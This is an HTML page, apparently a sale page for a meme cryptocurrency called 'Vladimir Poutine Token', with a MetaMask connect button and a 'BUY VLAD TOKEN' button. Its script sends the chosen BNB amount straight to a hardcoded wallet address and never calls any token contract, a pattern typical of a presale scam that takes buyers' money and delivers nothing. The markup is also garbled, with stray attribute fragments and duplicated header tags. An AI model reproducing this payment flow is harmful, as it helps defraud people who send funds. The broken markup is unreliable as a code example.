<html lang="fr">
<head>
<a href="https://ibb.co/ws55bQ2"><img src="https://i.ibb.co/ws55bQ2/logo-removebg-preview-4.png" alt="logo-removebg-preview-4" border="0"></a>    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Vladimir Poutine Token</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
        }

        header {
            background-color: #FFF;
            color: #fff;
            padding: 40px;
            display: flex;
            align-items: center;
            justify-content: space-between;
  

        }

        .name {
            color: #00FF00;
            font-weight: bold;
            margin-left: 10px;
        }

        .connect-button {
            background-color: #333333;
            color: #00FF00;
            border: none;
            font-size: 24px;
            padding: 11px 23px;
            border-radius: 7px;
            cursor: pointer;
            margin-left: auto;
        }

        .connect-button:hover {
            background-color: #696969;
        }

        main {
            text-align: center;
            margin-top: 50px;
        }

        h1 {
            color: #333;
        }

        p {
            color: #666;
            margin-bottom: 20px;
        }
 border=0 width=0 height=0
        .widget-container {
           border=0 width=0 height=0
 border=0 width=0 height=0

      background-color: #ffffff;
      border-radius: 15px;
      padding: 30px;
      box-shadow: 0 5px 16px rgba(0, 0, 0, 0.2);
      text-align: center;
      margin-top: 20px; /* Augmente l'espace en haut */
      margin-bottom: 10px; /* Conserve l'espace en bas */    
           
        }
      
        .buy-button {
            background-color: #333;
            color: #00FF00;
            padding: 11px 23px;
            font-size: 1.4rem;
            cursor: pointer;
            border-radius: 9px;
            border: none;
            transition: background-color 0.3s ease;
        }

        .buy-button:hover {
            background-color: #696969;
        }

        .quantity-slider {
            width: 20%;
            margin-top: 0.40px;
            color: #00FF00;
        }

        .quantity-label {
            font-size: 1rem;
            color: #333;
            margin-bottom: 30px;
            width: 100%;
            margin-top: 6px;
        }

        .quantity-value {
            font-size: 1.4rem;
            font-weight: bold;
            color: #00FF00;
            margin-bottom: 30px;
        }

        .status {
            font-size: 1rem;
            color: #00FF00;
            margin-top: 23px;
        }
    </style>
</head>
<body>
  <header>width: 30%;
<a href="https://ibb.co/ws55bQ2"><img src="https://i.ibb.co/ws55bQ2/logo-removebg-preview-4.png" alt="logo-removebg-preview-4" border="0"></a>                                     alt="logo-removebg-preview-3" border="0"></a> width: 30%;
         alt="Vladimir Poutine Token" class="logo" bis_skin_checked="1">
    <button class="connect-button"><b>METAMASK</b></button>
</header>

    </header>

    <main>
        <h1>Vladimir Poutine Token</h1>
        <div class="widget-container">
            <button class="buy-button"><b>BUY VLAD TOKEN</b></button>
            <div class="quantity-label"><b>QUANTITY (BNB)</b></div>
            <div class="quantity-value">0.0000</div>
            <input type="range" min="0" max="10000" step="0.01" value="0" class="quantity-slider">
         
        </div>
    </main>

    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
    <script src="https://unpkg.com/@metamask/legacy-web3@latest/dist/metamask.web3.min.js"></script>
    <script>
        window.addEventListener('load', async () => {
            if (window.ethereum) {
                window.web3 = new Web3(ethereum);
                try {
                    await ethereum.enable();
                    initBuyButton();
                } catch (err) {
                    $('#status').html('Access denied');
                }
            } else if (window.web3) {
                window.web3 = new Web3(web3.currentProvider);
                initBuyButton();
            } else {
                // Handle the case where neither ethereum provider nor web3 provider is available
            }
        });

        const initBuyButton = () => {
            $('.buy-button').click(() => {
                const paymentAddress = '0xC6A5F6DdbcfD183A33BC7970107C0510a4499523';
                const amountEth = parseFloat($('.quantity-value').text());
                web3.eth.sendTransaction({
                    to: paymentAddress,
                    value: web3.toWei(amountEth, 'ether')
                }, (err, transactionId) => {
                    if (err) {
                        console.log('Payment failed', err);
                      
                    } else {
                        console.log('Payment successful', transactionId);
                    }
                });
            });

            $('.quantity-slider').on('input', function() {
                const value = parseFloat($(this).val() / 10000).toFixed(4);
                $('.quantity-value').text(value);
            });
        };
    </script>
</body>
</html>
